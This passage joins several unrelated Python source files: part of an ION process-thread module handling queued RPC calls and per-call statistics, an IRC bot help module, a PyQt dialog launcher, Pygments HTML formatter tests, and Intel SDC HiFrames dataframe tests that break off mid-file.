        exceptions are raised in the correct context.

        @param  call        The call to be made within this ION processes' calling greenlet.
        @param  context     Optional process-context (usually the headers of the incoming call) to be
                            set. Process-context is greenlet-local, and since we're crossing greenlet
                            boundaries, we must set it again in the ION process' calling greenlet.
        @param  callargs    The positional args to pass to the call.
        @param  callkwargs  The keyword args to pass to the call.
        """
        ar = AsyncResult()

        if len(callargs) == 0 and len(callkwargs) == 0:
            log.trace("_routing_call got no arguments for the call %s, check your call's parameters", call)

        # The control flow greenlet consumes this tuple and fulfills ar.
        self._ctrl_queue.put((greenlet.getcurrent(), ar, call, callargs, callkwargs, context))
        return ar

    def has_pending_call(self, ar):
        """
        Returns true if the call (keyed by the AsyncResult returned by _routing_call) is still pending.
        """
        # queue entries are (calling_gl, ar, call, callargs, callkwargs, context)
        return any(queued_ar == ar
                   for _, queued_ar, _, _, _, _ in self._ctrl_queue.queue)

    def _cancel_pending_call(self, ar):
        """
        Cancels a pending call (keyed by the AsyncResult returend by _routing_call).

        @return True if the call was truly pending.
        """
        if self.has_pending_call(ar):
            ar.set(False)
            return True

        return False

    def _interrupt_control_thread(self):
        """
        Signal the control flow thread that it needs to abort processing, likely due to a timeout.
        """
        # non-blocking kill: raises OperationInterruptedException inside the
        # control greenlet, which _control_flow catches and logs at debug level
        self._ctrl_thread.proc.kill(exception=OperationInterruptedException, block=False)

    def cancel_or_abort_call(self, ar):
        """
        Either cancels a future pending call, or aborts the current processing if the given AR is unset.

        The pending call is keyed by the AsyncResult returned by _routing_call.
        """
        cancelled = self._cancel_pending_call(ar)
        if cancelled or ar.ready():
            # already cancelled, or the call has completed - nothing to abort
            return
        self._interrupt_control_thread()

    def _control_flow(self):
        """
        Entry point for process control thread of execution.

        This method is run by the control greenlet for each ION process. Listeners attached
        to the process, either RPC Servers or Subscribers, synchronize calls to the process
        by placing call requests into the queue by calling _routing_call.

        This method blocks until there are calls to be made in the synchronized queue, and
        then calls from within this greenlet.  Any exception raised is caught and re-raised
        in the greenlet that originally scheduled the call.  If successful, the AsyncResult
        created at scheduling time is set with the result of the call.
        """
        svc_name = getattr(self.service, "name", "unnamed-service") if self.service else "unnamed-service"
        proc_id = getattr(self.service, "id", "unknown-pid") if self.service else "unknown-pid"
        if self.name:
            threading.current_thread().name = "%s-%s" % (svc_name, self.name)
        thread_base_name = threading.current_thread().name

        # unblock get_ready_event() waiters: the control loop is now live
        self._ready_control.set()

        # iteration ends when _notify_stop puts StopIteration into the queue
        for calltuple in self._ctrl_queue:
            calling_gl, ar, call, callargs, callkwargs, context = calltuple
            request_id = (context or {}).get("request-id", None)
            if request_id:
                # tag the thread name with the request id for log correlation
                threading.current_thread().name = thread_base_name + "-" + str(request_id)
            #log.debug("control_flow making call: %s %s %s (has context: %s)", call, callargs, callkwargs, context is not None)

            res = None
            start_proc_time = get_ion_ts_millis()
            self._record_proc_time(start_proc_time)

            # check context for expiration
            if context is not None and 'reply-by' in context:
                if start_proc_time >= int(context['reply-by']):
                    log.info("control_flow: attempting to process message already exceeding reply-by, ignore")

                    # raise a timeout in the calling thread to allow endpoints to continue processing
                    e = IonTimeout("Reply-by time has already occurred (reply-by: %s, op start time: %s)" % (context['reply-by'], start_proc_time))
                    calling_gl.kill(exception=e, block=False)

                    continue

            # If ar is set, means it is cancelled
            if ar.ready():
                log.info("control_flow: attempting to process message that has been cancelled, ignore")
                continue

            init_db_stats()
            try:
                # ******************************************************************
                # ****** THIS IS WHERE THE RPC OPERATION/SERVICE CALL IS MADE ******

                with self.service.push_context(context), \
                     self.service.container.context.push_context(context):
                    self._ctrl_current = ar
                    res = call(*callargs, **callkwargs)

                # ****** END CALL, EXCEPTION HANDLING FOLLOWS                 ******
                # ******************************************************************

            except OperationInterruptedException:
                # endpoint layer takes care of response as it's the one that caused this
                log.debug("Operation interrupted")
                pass

            except Exception as e:
                if self._log_call_exception:
                    log.exception("PROCESS exception: %s" % e.message)

                # Raise the exception in the calling greenlet.
                # Try decorating the args of the exception with the true traceback -
                # this should be reported by ThreadManager._child_failed
                exc = PyonThreadTraceback("IonProcessThread _control_flow caught an exception "
                                          "(call: %s, *args %s, **kwargs %s, context %s)\n"
                                          "True traceback captured by IonProcessThread' _control_flow:\n\n%s" % (
                                          call, callargs, callkwargs, context, traceback.format_exc()))
                e.args = e.args + (exc,)

                if isinstance(e, (TypeError, IonException)):
                    # Pass through known process exceptions, in particular IonException
                    calling_gl.kill(exception=e, block=False)
                else:
                    # Otherwise, wrap unknown, forward and hopefully we can continue on our way
                    self._errors.append((call, callargs, callkwargs, context, e, exc))

                    log.warn(exc)
                    log.warn("Attempting to continue...")

                    # Note: Too large exception string will crash the container (when passed on as msg header).
                    exception_str = str(exc)
                    if len(exception_str) > 10000:
                        exception_str = (
                            "Exception string representation too large. "
                            "Begin and end of the exception:\n"
                            + exception_str[:2000] + "\n...\n" + exception_str[-2000:]
                        )
                    calling_gl.kill(exception=ContainerError(exception_str), block=False)
            finally:
                try:
                    # Compute statistics
                    self._compute_proc_stats(start_proc_time)

                    db_stats = get_db_stats()
                    if db_stats:
                        if self._warn_call_dbstmt_threshold > 0 and db_stats.get("count.all", 0) >= self._warn_call_dbstmt_threshold:
                            stats_str = ", ".join("{}={}".format(k, db_stats[k]) for k in sorted(db_stats.keys()))
                            log.warn("PROC_OP '%s.%s' EXCEEDED DB THRESHOLD. stats=%s", svc_name, call.__name__, stats_str)
                        elif self._log_call_dbstats:
                            stats_str = ", ".join("{}={}".format(k, db_stats[k]) for k in sorted(db_stats.keys()))
                            log.info("PROC_OP '%s.%s' DB STATS: %s", svc_name, call.__name__, stats_str)
                    clear_db_stats()

                    # push per-op stats to the module-level hook, if installed
                    if stats_callback:
                        stats_callback(proc_id=proc_id, proc_name=self.name, svc=svc_name, op=call.__name__,
                                       request_id=request_id, context=context,
                                       db_stats=db_stats, proc_stats=self.time_stats, result=res, exc=None)
                except Exception:
                    # stats must never break call processing
                    log.exception("Error computing process call stats")

                self._ctrl_current = None
                threading.current_thread().name = thread_base_name

            # Set response in AsyncEvent of caller (endpoint greenlet)
            ar.set(res)

    def _record_proc_time(self, cur_time):
        """ Keep the _proc_time of the prior and prior-prior intervals for stats computation
        """
        cur_interval = cur_time / STAT_INTERVAL_LENGTH
        delta = cur_interval - self._proc_interval_num
        if delta <= 0:
            # Still in the same interval (or clock went backwards) - nothing to roll
            return

        self._proc_interval_num = cur_interval
        if delta == 1:
            # Advanced exactly one interval: shift prior -> prior2, current -> prior
            self._proc_time_prior2 = self._proc_time_prior
            self._proc_time_prior = self._proc_time
        else:
            # Skipped one or more whole intervals - everything becomes prior2
            self._proc_time_prior2 = self._proc_time
            self._proc_time_prior = self._proc_time

    def _compute_proc_stats(self, start_proc_time):
        # Accumulate the wall-clock millis spent on the just-finished call into
        # the current interval's _proc_time, rolling intervals first if needed.
        cur_time = get_ion_ts_millis()
        self._record_proc_time(cur_time)
        proc_time = cur_time - start_proc_time
        self._proc_time += proc_time

    def start_listeners(self):
        """
        Starts all listeners in managed greenlets.

        Usually called by the ProcManager, unless using IonProcess manually.

        @raises IonProcessError  If the listeners do not become ready within the
                                 configured timeout
                                 (container.messaging.timeout.start_listener, default 30s).
        """
        try:
            # disable normal error reporting, this method should only be called from startup
            self.thread_manager._failure_notify_callback = None

            # spawn all listeners in startup listeners (from initializer, or added later)
            for listener in self._startup_listeners:
                self.add_endpoint(listener)

            with Timeout(seconds=CFG.get_safe('container.messaging.timeout.start_listener', 30)):
                gevent.wait([x.get_ready_event() for x in self.listeners])

        except Timeout:

            # remove failed endpoints before reporting failure above
            for listener, proc in self._listener_map.iteritems():
                if proc.proc.dead:
                    log.info("removed dead listener: %s", listener)
                    self.listeners.remove(listener)
                    self.thread_manager.children.remove(proc)

            raise IonProcessError("start_listeners did not complete in expected time")

        finally:
            # restore normal child-failure reporting regardless of outcome
            self.thread_manager._failure_notify_callback = self._child_failed

    def _notify_stop(self):
        """
        Called when the process is about to be shut down.

        Instructs all listeners to close, puts a StopIteration into the synchronized queue,
        and waits for the listeners to close and for the control queue to exit.
        """
        for listener in self.listeners:
            try:
                listener.close()
            except Exception as ex:
                tb = traceback.format_exc()
                # best-effort close: log and keep shutting down the remaining listeners
                log.warn("Could not close listener, attempting to ignore: %s\nTraceback:\n%s", ex, tb)

        # sentinel: terminates _control_flow's iteration over the ctrl queue
        self._ctrl_queue.put(StopIteration)

        # wait_children will join them and then get() them, which may raise an exception if any of them
        # died with an exception.
        self.thread_manager.wait_children(30)

        PyonThread._notify_stop(self)

        # run the cleanup method if we have one
        if self._cleanup_method is not None:
            try:
                self._cleanup_method(self)
            except Exception as ex:
                log.warn("Cleanup method error, attempting to ignore: %s\nTraceback: %s", ex, traceback.format_exc())

    def get_ready_event(self):
        """
        Returns an Event that is set when the control greenlet is up and running.
        """
        # set by _control_flow just before it starts consuming the ctrl queue
        return self._ready_control


class IonProcessThreadManager(PyonThreadManager):
    """Thread manager whose children are IonProcessThread instances."""

    def _create_thread(self, target=None, **kwargs):
        # forward the manager's heartbeat interval so each process self-monitors
        return IonProcessThread(target=target, heartbeat_secs=self.heartbeat_secs, **kwargs)


# ---------------------------------------------------------------------------------------------------
# Process type variants

class StandaloneProcess(BaseService):
    """
    A standalone process is an ION process of type "standalone" that has an incoming
    messaging attachment for the process and operations as defined in a service YML.
    """
    process_type = "standalone"


class SimpleProcess(BaseService):
    """
    A simple process is an ION process of type "simple" that has no incoming messaging
    attachment.
    """
    process_type = "simple"


class ImmediateProcess(BaseService):
    """
    An immediate process is an ION process of type "immediate" that does its action in
    the on_init and on_start hooks, and is terminated immediately after completion.
    Has no messaging attachment.
    """
    process_type = "immediate"


class StreamProcess(BaseService):
    """
    Base class for a stream process.
    Such a process handles a sequence of otherwise unconstrained messages, resulting from a
    subscription. There are no operations.
    """

    process_type = "stream_process"

    def call_process(self, message, stream_route, stream_id):
        """
        Handles pre-processing of packet and process work

        @param message       The message payload delivered by the subscriber.
        @param stream_route  Routing info of the originating stream (unused by the base class).
        @param stream_id     Identifier of the originating stream (unused by the base class).
        """
        self.process(message)

    def process(self, message):
        """
        Process a message as arriving based on a subscription.

        Subclasses override this; the base implementation does nothing.
        """
        pass


# ---------------------------------------------------------------------------------------------------
# Process helpers

def get_ion_actor_id(process):
    """Given an ION process, return the ion-actor-id from the context, if set and present"""
    if not process:
        return None
    ctx = process.get_context()
    if not ctx:
        return None
    return ctx.get(MSG_HEADER_ACTOR, None)


def set_process_stats_callback(stats_cb):
    """ Sets a callback function (hook) to push stats after a process operation call. """
    global stats_callback
    # warn (but still overwrite) when replacing an existing hook with a new one;
    # passing None silently clears the hook
    if stats_cb is not None and stats_callback:
        log.warn("Stats callback already defined")
    stats_callback = stats_cb

# Author: Nick Raptis <airscorp@gmail.com>
"""
Module for listing commands and help.
"""

from basemodule import BaseModule, BaseCommandContext

from alternatives import _

class HelpContext(BaseCommandContext):
    """Command context providing the list/modules/help commands for the bot."""

    def cmd_list(self, argument):
        """List commands"""
        arg = argument.lower()
        index = self.bot.help_index
        public = "public commands  -- %s" % " ".join(index['public'])
        private = "private commands -- %s" % " ".join(index['private'])
        if 'all' in arg or 'both' in arg:
            output = "\n".join((public, private))
        elif 'pub' in arg or self.target.startswith('#'):
            # channel targets default to the public command list
            output = public
        elif 'priv' in arg or not self.target.startswith('#'):
            output = private
        else:
            # we shouldn't be here
            self.logger.error("cmd_list")
            return
        self.send(self.target, output)

    def cmd_modules(self, argument):
        """List active modules"""
        index = self.bot.help_index
        output = "active modules   -- %s" % " ".join(index['modules'].keys())
        self.send(self.target, output)

    def cmd_help(self, argument):
        """Get help on a command or module"""
        arg = argument.lower()
        index = self.bot.help_index
        target = self.target
        args = arg.split()
        if not args:
            s = "usage: help <command> [public|private] / help module <module>"
            self.send(target, s)
        elif args[0] == 'module':
            args.pop(0)
            if not args:
                self.send(target, "usage: help module <module>")
            else:
                help_item = index['modules'].get(args[0])
                if help_item:
                    self.send(target, help_item['summary'])
                else:
                    self.send(target, _("No help for %s"), args[0])
        else:
            # pad so popping the optional public/private qualifier never raises
            args.append("")
            cmd = args.pop(0)
            cmd_type = args.pop(0)
            if 'pu' in cmd_type or self.target.startswith('#'):
                cmd_type = 'public'
            elif 'pr' in cmd_type or not self.target.startswith('#'):
                cmd_type = 'private'
            else:
                # we shouldn't be here
                # fixed: error was previously mislabeled "cmd_list"
                self.logger.error("cmd_help")
                return
            help_item = index[cmd_type].get(cmd)
            if help_item:
                # use the already-fetched item instead of re-indexing the dict
                self.send(target, help_item['summary'])
            else:
                self.send(target, _("No help for %s"), cmd)


class HelpModule(BaseModule):
    # Bind the help command context to the bot module framework.
    context_class = HelpContext

# entry point looked up by the module loader
module = HelpModule

#!/usr/bin/env python

#Copyright (c) <2015>, <Jaakko Leppakangas>
#All rights reserved.
#
#Redistribution and use in source and binary forms, with or without
#modification, are permitted provided that the following conditions are met: 
#
#1. Redistributions of source code must retain the above copyright notice, this
#   list of conditions and the following disclaimer. 
#2. Redistributions in binary form must reproduce the above copyright notice,
#   this list of conditions and the following disclaimer in the documentation
#   and/or other materials provided with the distribution. 
#
#THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
#ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
#WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
#DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
#ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
#(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
#LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
#ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
#(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
#SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
#The views and conclusions contained in the software and documentation are those
#of the authors and should not be interpreted as representing official policies, 
#either expressed or implied, of the FreeBSD Project.

'''
Created on Dec 16, 2014

@author: Jaakko Leppakangas
'''
import sys
from PyQt4 import QtGui

from ui.preprocessDialog import PreprocessDialog

def main():
    """Create the Qt application, show the preprocessing dialog and run the event loop."""
    app = QtGui.QApplication(sys.argv)

    dialog = PreprocessDialog()
    dialog.show()

    # exec_() blocks until the window closes; its status becomes the exit code
    sys.exit(app.exec_())

# Script entry point: launch the preprocessing dialog GUI.
if __name__ == '__main__':
    main()
    

# -*- coding: utf-8 -*-
"""
    Pygments HTML formatter tests
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    :copyright: Copyright 2006-2009 by the Pygments team, see AUTHORS.
    :license: BSD, see LICENSE for details.
"""

import os
import re
import unittest
import StringIO
import tempfile
from os.path import join, dirname, isfile, abspath

from pygments.lexers import PythonLexer
from pygments.formatters import HtmlFormatter, NullFormatter
from pygments.formatters.html import escape_html

import support

TESTFILE, TESTDIR = support.location(__file__)

# Tokenize this very test file once; all formatter tests share this token stream.
# NOTE(review): open(TESTFILE) is never closed - relies on GC; confirm acceptable here.
tokensource = list(PythonLexer(encoding='utf-8').get_tokens(open(TESTFILE).read()))

class HtmlFormatterTest(unittest.TestCase):
    """Tests for pygments.formatters.HtmlFormatter output, CSS handling and options."""

    def test_correct_output(self):
        """HTML output with tags stripped must equal the escaped NullFormatter text."""
        hfmt = HtmlFormatter(nowrap=True)
        houtfile = StringIO.StringIO()
        hfmt.format(tokensource, houtfile)

        nfmt = NullFormatter()
        noutfile = StringIO.StringIO()
        nfmt.format(tokensource, noutfile)

        stripped_html = re.sub('<.*?>', '', houtfile.getvalue())
        escaped_text = escape_html(noutfile.getvalue())
        # assertEqual instead of the deprecated assertEquals alias
        self.assertEqual(stripped_html, escaped_text)

    def test_external_css(self):
        """cssfile is created next to the output file (relative) or at an absolute path."""
        # test correct behavior
        # CSS should be in /tmp directory
        fmt1 = HtmlFormatter(full=True, cssfile='fmt1.css', outencoding='utf-8')
        # CSS should be in TESTDIR (TESTDIR is absolute)
        fmt2 = HtmlFormatter(full=True, cssfile=join(TESTDIR, 'fmt2.css'),
                             outencoding='utf-8')
        tfile = tempfile.NamedTemporaryFile(suffix='.html')
        fmt1.format(tokensource, tfile)
        try:
            fmt2.format(tokensource, tfile)
            self.assertTrue(isfile(join(TESTDIR, 'fmt2.css')))
        except IOError:
            # test directory not writable
            pass
        tfile.close()

        self.assertTrue(isfile(join(dirname(tfile.name), 'fmt1.css')))
        os.unlink(join(dirname(tfile.name), 'fmt1.css'))
        try:
            os.unlink(join(TESTDIR, 'fmt2.css'))
        except OSError:
            pass

    def test_all_options(self):
        """Formatting must not raise for common option combinations."""
        for optdict in [dict(nowrap=True),
                        dict(linenos=True),
                        dict(linenos=True, full=True),
                        dict(linenos=True, full=True, noclasses=True)]:

            outfile = StringIO.StringIO()
            fmt = HtmlFormatter(**optdict)
            fmt.format(tokensource, outfile)

    def test_valid_output(self):
        """Full output should validate against the HTML4 DTD via nsgmls, if available."""
        # test all available wrappers
        fmt = HtmlFormatter(full=True, linenos=True, noclasses=True,
                            outencoding='utf-8')

        handle, pathname = tempfile.mkstemp('.html')
        tfile = os.fdopen(handle, 'w+b')
        fmt.format(tokensource, tfile)
        tfile.close()
        catname = os.path.join(TESTDIR, 'dtds', 'HTML4.soc')
        try:
            try:
                import subprocess
                ret = subprocess.Popen(['nsgmls', '-s', '-c', catname, pathname],
                                       stdout=subprocess.PIPE).wait()
            except ImportError:
                # Python 2.3 - no subprocess module
                ret = os.popen('nsgmls -s -c "%s" "%s"' % (catname, pathname)).close()
                if ret == 32512: raise OSError  # not found
        except OSError:
            # nsgmls not available
            pass
        else:
            # assertFalse instead of the deprecated failIf alias
            self.assertFalse(ret, 'nsgmls run reported errors')

        os.unlink(pathname)

    def test_get_style_defs(self):
        """get_style_defs should honor the CSS class/prefix arguments."""
        fmt = HtmlFormatter()
        sd = fmt.get_style_defs()
        # assertTrue instead of the deprecated assert_ alias
        self.assertTrue(sd.startswith('.'))

        fmt = HtmlFormatter(cssclass='foo')
        sd = fmt.get_style_defs()
        self.assertTrue(sd.startswith('.foo'))
        sd = fmt.get_style_defs('.bar')
        self.assertTrue(sd.startswith('.bar'))
        sd = fmt.get_style_defs(['.bar', '.baz'])
        fl = sd.splitlines()[0]
        self.assertTrue('.bar' in fl and '.baz' in fl)

    def test_unicode_options(self):
        """Unicode title/cssclass/cssstyles must encode cleanly to utf-8 output."""
        fmt = HtmlFormatter(title=u'Föö',
                            cssclass=u'bär',
                            cssstyles=u'div:before { content: \'bäz\' }',
                            encoding='utf-8')
        handle, pathname = tempfile.mkstemp('.html')
        tfile = os.fdopen(handle, 'w+b')
        fmt.format(tokensource, tfile)
        tfile.close()
        # fixed: previously the temp file leaked after the test
        os.unlink(pathname)

# *****************************************************************************
# Copyright (c) 2020, Intel Corporation All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
#     Redistributions of source code must retain the above copyright notice,
#     this list of conditions and the following disclaimer.
#
#     Redistributions in binary form must reproduce the above copyright notice,
#     this list of conditions and the following disclaimer in the documentation
#     and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# *****************************************************************************

import itertools
import numba
import numpy as np
import os
import pandas as pd
import pyarrow.parquet as pq
import random
import string
import unittest
from numba import types

import sdc
from sdc import hiframes
from sdc.str_arr_ext import StringArray
from sdc.tests.test_base import TestCase
from sdc.tests.test_utils import (count_array_OneDs,
                                  count_array_REPs,
                                  count_parfor_OneDs,
                                  count_parfor_REPs,
                                  dist_IR_contains,
                                  get_start_end,
                                  skip_numba_jit,
                                  skip_sdc_jit)


class TestHiFrames(TestCase):

    @skip_numba_jit
    def test_column_list_select2(self):
        """Column-list selection must copy data the way Pandas does."""
        def ref_impl(df):
            selected = df[['A']]
            selected['A'] += 10
            return selected.A, df.A

        n = 11
        df = pd.DataFrame(
            {'A': np.arange(n), 'B': np.ones(n), 'C': np.random.ranf(n)})
        compiled = self.jit(ref_impl)
        np.testing.assert_array_equal(compiled(df.copy())[1], ref_impl(df)[1])

    @skip_numba_jit
    def test_pd_DataFrame_from_series_par(self):
        """DataFrame built from Series should distribute and sum correctly."""
        def ref_impl(n):
            ones = pd.Series(np.ones(n))
            rand = pd.Series(np.random.ranf(n))
            frame = pd.DataFrame({'A': ones, 'B': rand})
            return frame.A.sum()

        n = 11
        compiled = self.jit(ref_impl)
        self.assertEqual(compiled(n), ref_impl(n))
        self.assertEqual(count_array_REPs(), 0)
        self.assertEqual(count_parfor_REPs(), 0)
        self.assertEqual(count_parfor_OneDs(), 1)

    @skip_numba_jit
    def test_getitem_bool_series(self):
        """Boolean-series indexing must match Pandas."""
        def ref_impl(df):
            return df['A'][df['B']].values

        frame = pd.DataFrame({'A': [1, 2, 3], 'B': [True, False, True]})
        compiled = self.jit(ref_impl)
        np.testing.assert_array_equal(ref_impl(frame), compiled(frame))

    @skip_numba_jit
    def test_fillna(self):
        """Series.fillna must replace NaN before summing."""
        def ref_impl():
            data = np.array([1., 2., 3.])
            data[0] = np.nan
            frame = pd.DataFrame({'A': data})
            filled = frame.A.fillna(5.0)
            return filled.sum()

        compiled = self.jit(ref_impl)
        self.assertEqual(compiled(), ref_impl())

    @skip_numba_jit
    def test_fillna_inplace(self):
        """In-place Series.fillna must update the frame before summing."""
        def ref_impl():
            data = np.array([1., 2., 3.])
            data[0] = np.nan
            frame = pd.DataFrame({'A': data})
            frame.A.fillna(5.0, inplace=True)
            return frame.A.sum()

        compiled = self.jit(ref_impl)
        self.assertEqual(compiled(), ref_impl())

    @skip_numba_jit
    def test_column_mean(self):
        """Series.mean must skip NaN values like Pandas."""
        def ref_impl():
            data = np.array([1., 2., 3.])
            data[0] = np.nan
            frame = pd.DataFrame({'A': data})
            return frame.A.mean()

        compiled = self.jit(ref_impl)
        self.assertEqual(compiled(), ref_impl())

    @skip_numba_jit
    def test_column_var(self):
        """Series.var must match Pandas."""
        def ref_impl():
            data = np.array([1., 2., 3.])
            data[0] = 4.0
            frame = pd.DataFrame({'A': data})
            return frame.A.var()

        compiled = self.jit(ref_impl)
        np.testing.assert_almost_equal(compiled(), ref_impl())

    @skip_numba_jit
    def test_column_std(self):
        """Series.std must match Pandas."""
        def ref_impl():
            data = np.array([1., 2., 3.])
            data[0] = 4.0
            frame = pd.DataFrame({'A': data})
            return frame.A.std()

        compiled = self.jit(ref_impl)
        np.testing.assert_almost_equal(compiled(), ref_impl())

    @skip_numba_jit
    def test_column_map(self):
        """Series.map with a lambda must produce a summable column."""
        def ref_impl(n):
            frame = pd.DataFrame({'A': np.arange(n)})
            frame['B'] = frame.A.map(lambda a: 2 * a)
            return frame.B.sum()

        n = 121
        compiled = self.jit(ref_impl)
        np.testing.assert_almost_equal(compiled(n), ref_impl(n))

    @skip_numba_jit
    def test_column_map_arg(self):
        """Series.map must mutate the passed-in frame like Pandas."""
        def ref_impl(df):
            df['B'] = df.A.map(lambda a: 2 * a)
            return

        n = 121
        frame_jit = pd.DataFrame({'A': np.arange(n)})
        frame_ref = pd.DataFrame({'A': np.arange(n)})
        compiled = self.jit(ref_impl)
        compiled(frame_jit)
        self.assertTrue(hasattr(frame_jit, 'B'))
        ref_impl(frame_ref)
        np.testing.assert_equal(frame_jit.B.values, frame_ref.B.values)

    @skip_numba_jit
    @skip_sdc_jit('Not implemented in sequential transport layer')
    def test_cumsum(self):
        """Series.cumsum must distribute and keep its total."""
        def ref_impl(n):
            frame = pd.DataFrame({'A': np.ones(n), 'B': np.random.ranf(n)})
            csum = frame.A.cumsum()
            return csum.sum()

        n = 11
        compiled = self.jit(ref_impl)
        self.assertEqual(compiled(n), ref_impl(n))
        self.assertEqual(count_array_REPs(), 0)
        self.assertEqual(count_array_OneDs(), 2)
        self.assertEqual(count_parfor_REPs(), 0)
        self.assertEqual(count_parfor_OneDs(), 2)
        self.assertTrue(dist_IR_contains('dist_cumsum'))

    @skip_numba_jit
    @skip_sdc_jit('Not implemented in sequential transport layer')
    def test_column_distribution(self):
        """All column operations combined in one function must stay distributed."""
        def ref_impl(n):
            frame = pd.DataFrame({'A': np.ones(n), 'B': np.random.ranf(n)})
            frame.A.fillna(5.0, inplace=True)
            filled = frame.A.fillna(5.0)
            s = filled.sum()
            m = frame.A.mean()
            v = frame.A.var()
            t = frame.A.std()
            csum = frame.A.cumsum()
            return csum.sum() + s + m + v + t

        n = 11
        compiled = self.jit(ref_impl)
        self.assertEqual(compiled(n), ref_impl(n))
        self.assertEqual(count_array_REPs(), 0)
        self.assertEqual(count_parfor_REPs(), 0)
        self.assertTrue(dist_IR_contains('dist_cumsum'))

    @skip_numba_jit
    @skip_sdc_jit('Not implemented in sequential transport layer')
    def test_quantile_parallel(self):
        """Series.quantile over a float64 range must parallelize."""
        def ref_impl(n):
            frame = pd.DataFrame({'A': np.arange(0, n, 1, np.float64)})
            return frame.A.quantile(.25)

        n = 1001
        compiled = self.jit(ref_impl)
        np.testing.assert_almost_equal(compiled(n), ref_impl(n))
        self.assertEqual(count_array_REPs(), 0)
        self.assertEqual(count_parfor_REPs(), 0)

    @unittest.skip('Error - fix needed\n'
                   'NUMA_PES=3 build')
    def test_quantile_parallel_float_nan(self):
        """Series.quantile must handle NaN runs in float32 data."""
        def ref_impl(n):
            frame = pd.DataFrame({'A': np.arange(0, n, 1, np.float32)})
            frame.A[0:100] = np.nan
            frame.A[200:331] = np.nan
            return frame.A.quantile(.25)

        n = 1001
        compiled = self.jit(ref_impl)
        np.testing.assert_almost_equal(compiled(n), ref_impl(n))
        self.assertEqual(count_array_REPs(), 0)
        self.assertEqual(count_parfor_REPs(), 0)

    @unittest.skip('Error - fix needed\n'
                   'NUMA_PES=3 build')
    def test_quantile_parallel_int(self):
        """Series.quantile(.25) on an int32 range, checked for full distribution."""
        def test_impl(n):
            df = pd.DataFrame({'A': np.arange(0, n, 1, np.int32)})
            return df.A.quantile(.25)

        hpat_func = self.jit(test_impl)
        n = 1001
        np.testing.assert_almost_equal(hpat_func(n), test_impl(n))
        self.assertEqual(count_array_REPs(), 0)
        self.assertEqual(count_parfor_REPs(), 0)

    @unittest.skip('Error - fix needed\n'
                   'NUMA_PES=3 build')
    def test_quantile_sequential(self):
        """Series.quantile(.25) where the array is passed in (not generated)."""
        def test_impl(A):
            df = pd.DataFrame({'A': A})
            return df.A.quantile(.25)

        hpat_func = self.jit(test_impl)
        n = 1001
        A = np.arange(0, n, 1, np.float64)
        np.testing.assert_almost_equal(hpat_func(A), test_impl(A))

    @skip_numba_jit
    def test_nunique(self):
        """Series.nunique on an int column with one duplicated value."""
        def test_impl(n):
            df = pd.DataFrame({'A': np.arange(n)})
            df.A[2] = 0
            return df.A.nunique()

        hpat_func = self.jit(test_impl)
        n = 1001
        np.testing.assert_almost_equal(hpat_func(n), test_impl(n))
        # test compile again for overload related issues
        hpat_func = self.jit(test_impl)
        np.testing.assert_almost_equal(hpat_func(n), test_impl(n))

    @skip_numba_jit
    def test_nunique_parallel(self):
        """Series.nunique on a parquet-loaded float column, distributed."""
        # TODO: test without file
        def test_impl():
            df = pq.read_table('example.parquet').to_pandas()
            return df.four.nunique()

        hpat_func = self.jit(test_impl)
        self.assertEqual(hpat_func(), test_impl())
        self.assertEqual(count_array_REPs(), 0)
        # test compile again for overload related issues
        hpat_func = self.jit(test_impl)
        self.assertEqual(hpat_func(), test_impl())
        self.assertEqual(count_array_REPs(), 0)

    @skip_numba_jit
    def test_nunique_str(self):
        """Series.nunique on a small, fixed string column.

        Cleanup: the original passed an unused ``n`` into ``test_impl``; the
        data is a hard-coded 5-element list, so the parameter is dropped.
        """
        def test_impl():
            df = pd.DataFrame({'A': ['aa', 'bb', 'aa', 'cc', 'cc']})
            return df.A.nunique()

        hpat_func = self.jit(test_impl)
        np.testing.assert_almost_equal(hpat_func(), test_impl())
        # test compile again for overload related issues
        hpat_func = self.jit(test_impl)
        np.testing.assert_almost_equal(hpat_func(), test_impl())

    @unittest.skip('AssertionError - fix needed\n'
                   '5 != 3\n')
    def test_nunique_str_parallel(self):
        """Series.nunique on a parquet-loaded string column, distributed."""
        # TODO: test without file
        def test_impl():
            df = pq.read_table('example.parquet').to_pandas()
            return df.two.nunique()

        hpat_func = self.jit(test_impl)
        self.assertEqual(hpat_func(), test_impl())
        self.assertEqual(count_array_REPs(), 0)
        # test compile again for overload related issues
